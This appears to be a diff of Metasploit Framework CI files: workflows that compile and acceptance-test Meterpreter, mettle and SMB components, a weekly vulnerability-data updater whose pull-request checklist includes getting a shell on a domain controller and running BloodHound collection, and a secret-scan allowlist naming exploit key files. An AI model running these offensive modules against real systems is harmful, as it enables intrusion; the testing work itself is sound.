+        run: echo "METTLE_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" lib/metasploit_payloads/mettle/version.rb)" | tee -a $GITHUB_ENV
+        working-directory: mettle
+
+      - name: Prerequisite mettle gem setup
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        run: |
+          set -x
+          ruby -pi.bak -e "gsub(/${{ env.METTLE_VERSION }}/, '${{ env.METTLE_VERSION }}-dev')" lib/metasploit_payloads/mettle/version.rb
+        working-directory: mettle
+
+      - name: Compile mettle payloads
+        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os != 'macos' && inputs.build_mettle }}
+        run: |
+          docker run --rm=true --tty --volume=$(pwd):/mettle --workdir=/mettle rapid7/build:mettle rake mettle:build mettle:check
+          rake build
+        working-directory: mettle
+
+      - name: Compile mettle payloads - macOS
+        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os == 'macos' && inputs.build_mettle }}
+        run: |
+          make TARGET=x86_64-apple-darwin
+          rake build
+        working-directory: mettle
+
+      - name: Checkout metasploit-framework commit
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-framework
+          path: metasploit-framework
+          ref: ${{ inputs.metasploit_framework_commit }}
+
+      - name: Setup Ruby
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+          # Required for macos13 pg gem compilation
+          PKG_CONFIG_PATH: "/usr/local/opt/libpq/lib/pkgconfig"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+          cache-version: 5
+          working-directory: metasploit-framework
+
+      - name: Move mettle gem into framework
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        run: |
+          cp ../mettle/pkg/metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem .
+        working-directory: metasploit-framework
+
+      - uses: actions/download-artifact@v4
+        name: Download Meterpreter
+        id: download_meterpreter
+        if: ${{ matrix.meterpreter.name != 'mettle' && inputs.build_metasploit_payloads }}
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: Extract Meterpreter (Unix)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
+        shell: bash
+        run: |
+          set -x
+          download_path=${{steps.download_meterpreter.outputs.download-path}}
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework
+
+      - name: Extract Meterpreter (Windows)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
+        shell: bash
+        run: |
+          set -x
+          download_path=$(cygpath -u '${{steps.download_meterpreter.outputs.download-path}}')
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework
+
+      - name: Install mettle gem
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        run: |
+          set -x
+          bundle exec gem install metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem
+          ruby -pi.bak -e "gsub(/'metasploit_payloads-mettle', '.*'/, '\'metasploit_payloads-mettle\', \'${{ env.METTLE_VERSION }}.pre.dev\'')" metasploit-framework.gemspec
+          bundle config unset deployment
+          bundle update metasploit_payloads-mettle
+          bundle install
+        working-directory: metasploit-framework
+
+      - name: Checkout metasploit-payloads
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-payloads
+          path: metasploit-payloads
+          ref: ${{ inputs.metasploit_payloads_commit }}
+
+      - name: Build Windows payloads via Visual Studio 2019 Build (Windows)
+        shell: cmd
+        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2019' && inputs.build_metasploit_payloads }}
+        run: |
+          cd c/meterpreter
+          git submodule init && git submodule update
+          "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat
+        working-directory: metasploit-payloads
+
+      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
+        shell: cmd
+        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
+        run: |
+          cd c/meterpreter
+          git submodule init && git submodule update
+          make.bat
+        working-directory: metasploit-payloads
+
+      - name: Get metasploit-payloads version
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        shell: bash
+        run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
+        working-directory: metasploit-payloads
+
+      - name: Install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' }}
+        run: |
+          ruby -pi -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec (Windows)
+        if: ${{ inputs.build_metasploit_payloads && (runner.os == 'Windows' && matrix.meterpreter.name != 'windows_meterpreter') && matrix.meterpreter.name != 'mettle' }}
+        shell: cmd
+        run: |
+          ruby -pi.bak -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Bundle update/install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle config unset deployment
+          bundle update metasploit-payloads
+          bundle install
+        working-directory: metasploit-framework
+
+      - name: Acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/meterpreter_spec.rb
+        working-directory: metasploit-framework
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
+          path: metasploit-framework/tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs: [test]
+    runs-on: ubuntu-latest
+    if: always() && needs.test.result != 'skipped'
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+        with:
+          repository: rapid7/metasploit-framework
+          ref: ${{ inputs.metasploit_framework_commit }}
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '3.3'
+          bundler-cache: true
+          cache-version: 5
+
+      - uses: actions/download-artifact@v4
+        id: raw_report_data
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.raw_report_data.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.raw_report_data.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.raw_report_data.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.raw_report_data.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -0,0 +1,185 @@
+name: Shared SMB Acceptance
+on:
+  workflow_call:
+    inputs:
+      # Defaults set as '' will use the current branch as their commit
+      metasploit_framework_commit:
+        description: "metasploit-framework commit to build with"
+        default: ''
+        required: false
+        type: string
+      build_smb:
+        description: "Whether or not to build ruby_smb"
+        default: false
+        required: false
+        type: boolean
+
+jobs:
+  smb:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 60
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+      SMB_USERNAME: acceptance_tests_user
+      SMB_PASSWORD: acceptance_tests_password
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    name: SMB Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      # The job checkout structure is:
+      #  .
+      #  ├── metasploit-framework
+      #  └── ruby_smb
+      - name: Checkout ruby_smb
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/ruby_smb
+          path: ruby_smb
+
+      - name: Get ruby_smb version
+        if: ${{ inputs.build_smb }}
+        run: |
+          echo "RUBY_SMB_VERSION=$(grep -oh '[0-9].[0-9].[0-9]*' lib/ruby_smb/version.rb)" | tee -a $GITHUB_ENV
+        working-directory: ruby_smb
+
+      - name: Build ruby_smb gem
+        if: ${{ inputs.build_smb }}
+        run: |
+          gem build ruby_smb.gemspec
+        working-directory: ruby_smb
+
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout metasploit-framework code
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-framework
+          path: metasploit-framework
+          ref: ${{ inputs.metasploit_framework_commit }}
+
+      - name: Run docker container
+        working-directory: 'metasploit-framework'
+        run: |
+          cd test/smb
+          docker compose build
+          docker compose up --wait -d
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          working-directory: 'metasploit-framework'
+
+      - name: Copy ruby_smb gem into metasploit-framework
+        if: ${{ inputs.build_smb }}
+        run: |
+          cp ../ruby_smb/ruby_smb-${{ env.RUBY_SMB_VERSION }}.gem .
+        working-directory: metasploit-framework
+
+      - name: Install ruby_smb gem
+        if: ${{ inputs.build_smb }}
+        run: |
+          bundle exec gem install ruby_smb-${{ env.RUBY_SMB_VERSION }}.gem
+          bundle config unset deployment
+          bundle update ruby_smb
+          bundle install
+        working-directory: metasploit-framework
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: 'latest'
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/smb_spec.rb
+        working-directory: metasploit-framework
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: smb_acceptance-${{ matrix.os }}
+          path: metasploit-framework/tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - smb
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-framework
+          path: metasploit-framework
+          ref: ${{ inputs.metasploit_framework_commit }}
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          working-directory: metasploit-framework
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+        working-directory: metasploit-framework
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -1,4 +1,4 @@
-name: Acceptance
+name: SMB Acceptance

 # Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
 #concurrency:
@@ -42,125 +42,5 @@ on:
 #    - cron: '*/15 * * * *'

 jobs:
-  smb:
-    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
-
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - '3.2'
-        os:
-          - ubuntu-latest
-
-    env:
-      RAILS_ENV: test
-      SMB_USERNAME: acceptance_tests_user
-      SMB_PASSWORD: acceptance_tests_password
-      BUNDLE_WITHOUT: "coverage development pcap"
-
-    name: SMB Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
-    steps:
-      - name: Install system dependencies
-        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
-
-      - name: Checkout code
-        uses: actions/checkout@v4
-
-      - name: Run docker container
-        working-directory: 'test/smb'
-        run: |
-          docker compose build
-          docker compose up --wait -d
-
-      - name: Setup Ruby
-        env:
-          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
-          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-
-      - name: acceptance
-        env:
-          SPEC_HELPER_LOAD_METASPLOIT: false
-          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
-          RUNTIME_VERSION: 'latest'
-        # Unix run command:
-        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
-        # Windows cmd command:
-        #   set SPEC_HELPER_LOAD_METASPLOIT=false
-        #   bundle exec rspec .\spec\acceptance
-        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
-        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
-        run: |
-          bundle exec rspec spec/acceptance/smb_spec.rb
-
-      - name: Archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
-          name: smb_acceptance-${{ matrix.os }}
-          path: tmp/allure-raw-data
-
-  # Generate a final report from the previous test results
-  report:
-    name: Generate report
-    needs:
-      - smb
-    runs-on: ubuntu-latest
-    if: always()
-
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-        if: always()
-
-      - name: Install system dependencies (Linux)
-        if: always()
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      - name: Setup Ruby
-        if: always()
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-          cache-version: 4
-          # Github actions with Ruby requires Bundler 2.2.18+
-          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
-          bundler: 2.2.33
-
-      - uses: actions/download-artifact@v4
-        id: download
-        if: always()
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: allure generate
-        if: always()
-        run: |
-          export VERSION=2.22.1
-
-          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
-          tar -zxvf allure-$VERSION.tgz -C .
-
-          ls -la ${{steps.download.outputs.download-path}}
-          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
-
-          find ${{steps.download.outputs.download-path}}
-          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
-
-      - name: archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          name: final-report-${{ github.run_id }}
-          path: |
-            ./allure-report
+  build:
+    uses: ./.github/workflows/shared_smb_acceptance.yml
@@ -29,7 +29,7 @@ on:
 jobs:
  build:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60
    name: Docker Build
    steps:
      - name: Checkout code
@@ -37,15 +37,11 @@ jobs:

      - name: docker-compose build
        run: |
-          curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
-          chmod +x docker-compose
-          sudo mv docker-compose /usr/bin
-
-          /usr/bin/docker-compose build
+          docker compose build

  test:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      postgres:
@@ -55,7 +51,7 @@ jobs:
          POSTGRES_USER: postgres
          POSTGRES_PASSWORD: postgres
        options: >-
-          --health-cmd pg_isready
+          --health-cmd "pg_isready --username postgres"
          --health-interval 10s
          --health-timeout 5s
          --health-retries 5
@@ -64,18 +60,15 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.1'
          - '3.2'
          - '3.3'
-          - '3.4.0-preview1'
+          - '3.4'
        os:
          - ubuntu-20.04
          - ubuntu-latest
-        exclude:
-          - { os: ubuntu-latest, ruby: '3.0' }
        include:
          - os: ubuntu-latest
-            ruby: '3.1'
+            ruby: '3.2'
            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
@@ -0,0 +1,98 @@
+name: Weekly Data and External Tool Updater
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: write
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: write
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  schedule:
+    # Run once a week (e.g., every Monday at 01:00 UTC)
+    - cron: '0 1 * * 1'
+  workflow_dispatch: # Allows manual triggering from the Actions tab
+
+jobs:
+  update-data-files:
+    runs-on: ubuntu-latest
+
+    if: github.repository_owner == 'rapid7'
+
+    env:
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+
+      - uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Run Ruby updater scripts
+        run: |
+          ruby tools/dev/update_wordpress_vulnerabilities.rb
+          ruby tools/dev/update_joomla_components.rb
+          ruby tools/dev/update_user_agent_strings.rb
+          ruby tools/dev/check_external_scripts.rb -u
+      - name: Remove vendor folder # prevent git from adding it
+        run: rm -rf vendor
+
+      - name: Create Pull Request
+        uses: peter-evans/create-pull-request@v7
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+          commit-message: Update report
+          base: master
+          branch: weekly-updates
+          committer: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          author: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          title: "Weekly Data Update"
+          draft: false
+          body: |
+            This pull request was created automatically by a GitHub Action to update data files and external scripts.
+            The following tools were run:
+            - ruby tools/dev/update_wordpress_vulnerabilities.rb
+            - ruby tools/dev/update_joomla_components.rb
+            - ruby tools/dev/update_user_agent_strings.rb
+            - ruby tools/dev/check_external_scripts.rb -u
+            ## Verification
+            ### Wordpress/Joomla Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] Start `msfconsole`
+            - [ ] `use modules/auxiliary/scanner/http/wordpress_scanner`
+            - [ ] **Verify** it runs
+            ### JTR Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] See https://docs.metasploit.com/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes for hashes and cracking
+            ### SharpHound
+            - [ ] Start `msfconsole`
+            - [ ] get a shell on a DC or box connected to a dc
+            - [ ] `use post/windows/gather/bloodhound`
+            - [ ] `set session`
+            - [ ] `run`
+            - [ ] **Verify** it runs w/o erroring
+            - [ ] `set method disk`
+            - [ ] **Verify** it runs w/o erroring
@@ -0,0 +1,46 @@
+06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:73
+06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:76
+06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:119
+deabf9b1d846e4ced5dca20be5e21e8732762889:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2023_22527.md:16
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_proxy:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_proxy:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_collector:1
+58f9a39f72c623ab337a6768b34dc32f06d8ae67:documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md:60
+686d704b371da3545f21b281b4ee29f3863cd3b7:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:57
+686d704b371da3545f21b281b4ee29f3863cd3b7:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:57
+619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
+619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
+619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
+619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:65
+e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
+e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
+e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
+e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:93
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:7642
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:8471
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:8472
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:77
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:77
+94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/python_flask_cookie_signer.md:99
@@ -17,6 +17,7 @@ todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>               <todb@metasploit.com>
 todb-r7 <todb-r7@github>               <todb@packetfu.com>
 dledda-r7 <dledda-r7@github>           <diego_ledda@rapid7.com>
+msutovsky-r7 <msutovsky-r7@github>     <martin_sutovsky@rapid7.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -121,6 +122,7 @@ m-1-k-3 <m-1-k-3@github>               Michael Messner <devnull@s3cur1ty.de>
 Meatballs1 <Meatballs1@github>         <eat_meatballs@hotmail.co.uk>
 Meatballs1 <Meatballs1@github>         <Meatballs1@users.noreply.github.com>
 mubix <mubix@github>                   Rob Fuller <jd.mubix@gmail.com>
+mwalas-r7 <mwalas-r7@github>           <marcin_walas@rapid7.com>
 net-ninja <net-ninja@github.com>       Steven Seeley <steventhomasseeley@gmail.com>
 nevdull77 <nevdull77@github>           Patrik Karlsson <patrik@cqure.net>
 nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk>
@@ -185,4 +187,4 @@ Jenkins Bot <jenkins@rapid7.com>          Jenkins <jenkins@rapid7.com>
